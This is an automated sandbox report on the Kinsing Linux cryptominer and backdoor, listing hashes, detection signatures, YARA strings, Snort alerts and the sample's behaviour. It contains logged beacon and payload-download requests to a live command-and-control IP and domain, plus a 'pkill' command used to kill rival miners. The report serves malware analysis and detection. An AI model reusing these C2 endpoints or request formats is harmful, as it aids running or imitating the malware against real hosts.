Edit tour

Linux Analysis Report
kinsing_aarch64.elf

Overview

General Information

Sample Name:	kinsing_aarch64.elf
Analysis ID:	1350023
MD5:	da753ebcfe793614129fc11890acedbc
SHA1:	ee458e526125d60cc1a387b4163376be8e9bc689
SHA256:	c6fbd6896d162a12d9c900056781eb82f44649945808b7b009646b5397bcf6bf
Tags:	elf
Infos:

Detection

Kinsing

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Kinsing Miner

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Executes the "kill" or "pkill" command typically used to terminate processes

Reads CPU information from /sys indicative of miner or evasive malware

Yara signature match

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Creates hidden files and/or directories

Sample has stripped symbol table

Found strings indicative of a multi-platform dropper

Reads CPU information from /proc indicative of miner or evasive malware

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1350023
Start date and time:	2023-11-29 17:58:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample file name:	kinsing_aarch64.elf
Detection:	MAL
Classification:	mal80.mine.linELF@0/1@12/0

Warnings

VT rate limit hit for: kinsing_aarch64.elf

Runtime Messages

Command:	/tmp/kinsing_aarch64.elf
PID:	6209
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

kinsing_aarch64.elf (PID: 6209, Parent: 6124, MD5: 02e8e39e1b46472a60d128a6da84a2b8) Arguments: /tmp/kinsing_aarch64.elf

kinsing_aarch64.elf New Fork (PID: 6214, Parent: 6209)

kinsing_aarch64.elf (PID: 6214, Parent: 6209, MD5: 02e8e39e1b46472a60d128a6da84a2b8) Arguments: /tmp/kinsing_aarch64.elf

kinsing_aarch64.elf New Fork (PID: 6275, Parent: 6214)

sh (PID: 6275, Parent: 6214, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pkill -f kdevtmpfsi"

sh New Fork (PID: 6278, Parent: 6275)

pkill (PID: 6278, Parent: 6275, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -f kdevtmpfsi

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Kinsing		No Attribution	https://blog.aquasec.com/kinsing-malware-exploits-novel-openfire-vulnerability https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability https://medium.com/s2wblog/logs-of-log4shell-cve-2021-44228-log4j-is-ubiquitous-en-809064312039 https://redcanary.com/blog/kinsing-malware-citrix-saltstack/ https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
kinsing_aarch64.elf	JoeSecurity_Kinsing	Yara detected Kinsing Miner	Joe Security
kinsing_aarch64.elf	MALWARE_Linux_Kinsing	Kinsing RAT payload	ditekSHen	0x31d43c:$s1: backconnect 0x321883:$s1: backconnect 0x3e0309:$s1: backconnect 0x3e031a:$s1: backconnect 0x3dff3a:$s2: connectForSocks 0x3dff4f:$s2: connectForSocks 0x327140:$s3: downloadAndExecute 0x329ffb:$s3: downloadAndExecute 0x3e035e:$s3: downloadAndExecute 0x3e0376:$s3: downloadAndExecute 0x3e0394:$s3: downloadAndExecute 0x31dba3:$s4: download_and_exec 0x31c829:$s5: masscan 0x31fb93:$s5: masscan 0x320b9f:$s5: masscan 0x3e02be:$s5: masscan 0x3243dc:$s6: UpdateCommand: 0x324c24:$s6: UpdateCommand: 0x327a3f:$s6: UpdateCommand: 0x3ea760:$s7: exec_out 0x31eacf:$s8: doTask with type %s

Snort Signatures

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051178802030108 11/29/23-18:00:28.364246
SID:	2030108
Source Port:	51178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051162802030108 11/29/23-18:00:06.985572
SID:	2030108
Source Port:	51162
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051166802030108 11/29/23-18:00:09.294226
SID:	2030108
Source Port:	51166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051198802030108 11/29/23-18:00:33.079065
SID:	2030108
Source Port:	51198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051174802030108 11/29/23-18:00:14.025607
SID:	2030108
Source Port:	51174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor - Sending SOCKS Details - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051178802030109 11/29/23-18:00:28.364246
SID:	2030109
Source Port:	51178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051180802030108 11/29/23-18:00:28.364585
SID:	2030108
Source Port:	51180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051204802030108 11/29/23-18:00:36.347754
SID:	2030108
Source Port:	51204
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051170802030108 11/29/23-18:00:11.590604
SID:	2030108
Source Port:	51170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051190802030108 11/29/23-18:00:30.732714
SID:	2030108
Source Port:	51190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051192802030108 11/29/23-18:00:30.771353
SID:	2030108
Source Port:	51192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051158802030108 11/29/23-18:00:04.674507
SID:	2030108
Source Port:	51158
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051150802030108 11/29/23-17:59:58.397598
SID:	2030108
Source Port:	51150
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051182802030108 11/29/23-18:00:28.368160
SID:	2030108
Source Port:	51182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN nspps Backdoor CnC Activity - Source IP: 192.168.2.23 - Destination IP: 185.154.53.140

Timestamp:	192.168.2.23185.154.53.14051154802030108 11/29/23-18:00:02.260802
SID:	2030108
Source Port:	51154
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /mu HTTP/1.1Host: 185.154.53.140User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Connection: closeContent-Length: 0Arch: arm64Cores: 2Id: AVlUGnSVaInqKQGUMEBcdUNwlsHekBMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Root: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip

Source: unknown

DNS traffic detected: queries for: vocaltube.ru

Source: global traffic	HTTP traffic detected: GET /mg HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Cores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/mgRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /mu HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Cores: 2Id: AVlUGnSVaInqKQGUMEBcdUNwlsHekBMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/muRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /l HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/lRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /l HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/lRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /mu HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Cores: 2Id: kEYItBUgmVxsTilBfeqnkdZqlVWoUaMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/muRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /l HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/lRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /ms HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/msRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /ki HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Cores: 2Id: PyWRaVRDRnQAcWRRwJdRWSbSFfMtYuMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/kiRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /get HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Cores: 2Id: lXgcADDgNTANSlVMuXVSaaNzBRcFOCMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/getRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /s HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/sRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /l HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/lRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /l HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/lRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /h2 HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Cores: 2Id: XkuYcgDAciutzIypiAiuryUVKkvyRoMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/h2Root: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /ms HTTP/1.1Host: vocaltube.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Arch: arm64Content-Type: application/octet-streamCores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Referer: http://185.154.53.140/msRoot: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /mg HTTP/1.1Host: 185.154.53.140User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Connection: closeArch: arm64Cores: 2Mem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Root: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /get HTTP/1.1Host: 185.154.53.140User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Connection: closeArch: arm64Cores: 2Id: lXgcADDgNTANSlVMuXVSaaNzBRcFOCMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Root: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /h2 HTTP/1.1Host: 185.154.53.140User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36Connection: closeArch: arm64Cores: 2Id: XkuYcgDAciutzIypiAiuryUVKkvyRoMem: 2992Os: linuxOsname: ubuntuOsversion: 20.04Root: trueStarted: 1701277137Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5Version: 39Accept-Encoding: gzip

System Summary

Malicious sample detected (through community Yara rule)

Source: kinsing_aarch64.elf, type: SAMPLE

Matched rule: Kinsing RAT payload Author: ditekSHen

Source: kinsing_aarch64.elf, type: SAMPLE

Matched rule: MALWARE_Linux_Kinsing author = ditekSHen, description = Kinsing RAT payload

Source: ELF static info symbol of initial sample

.symtab present: no

Source: ELF file section

Submission: kinsing_aarch64.elf

Source: classification engine

Classification label: mal80.mine.linELF@0/1@12/0

Source: /usr/bin/sh (PID: 6278)

Pkill executable: /usr/bin/pkill -> pkill -f kdevtmpfsi

Jump to behavior

Source: /tmp/kinsing_aarch64.elf (PID: 6209)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Reads from proc file: /proc/stat	Jump to behavior
Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Reads from proc file: /proc/meminfo	Jump to behavior

Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1582/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/3088/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/230/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/230/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/110/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/110/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/231/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/231/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/111/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/111/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/232/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/232/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1579/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/112/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/112/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/233/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/233/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1699/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/113/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/113/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/234/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/234/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1335/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1698/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/114/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/114/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/235/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/235/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1334/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1576/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/2302/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/115/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/115/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/236/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/236/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/116/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/116/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/237/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/237/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/117/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/117/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/118/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/118/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/910/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/910/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/119/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/119/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/912/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/912/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/10/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/10/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/2307/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/11/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/11/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/918/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/918/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/12/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/12/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/13/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/13/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/14/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/14/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/15/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/15/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/16/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/16/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/17/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/17/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/18/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/18/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1594/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1594/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/120/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/120/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/121/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/121/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1349/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1349/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/1/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/122/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/122/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/243/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/243/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/123/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/123/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/2/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/2/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/124/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/124/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/3/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/3/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/4/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/4/cmdline	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/125/status	Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	File opened: /proc/125/cmdline	Jump to behavior

Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Directory: /tmp/.ICEd-unix	Jump to behavior
Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Directory: /var/tmp/.ICEd-unix	Jump to behavior
Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Directory: /dev/shm/.ICEd-unix	Jump to behavior

Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior
Source: /usr/bin/pkill (PID: 6278)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior

Source: /tmp/kinsing_aarch64.elf (PID: 6209)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/kinsing_aarch64.elf (PID: 6214)	Queries kernel information via 'uname':			Jump to behavior

Source: /tmp/kinsing_aarch64.elf (PID: 6214)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

